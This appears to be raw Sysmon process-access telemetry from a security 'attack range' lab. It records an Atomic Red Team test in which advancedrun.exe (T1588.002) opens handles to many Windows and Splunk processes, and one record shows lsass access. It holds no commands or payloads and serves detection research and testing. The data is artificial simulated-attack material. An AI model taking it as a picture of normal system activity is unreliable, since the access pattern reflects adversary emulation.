17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003983109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 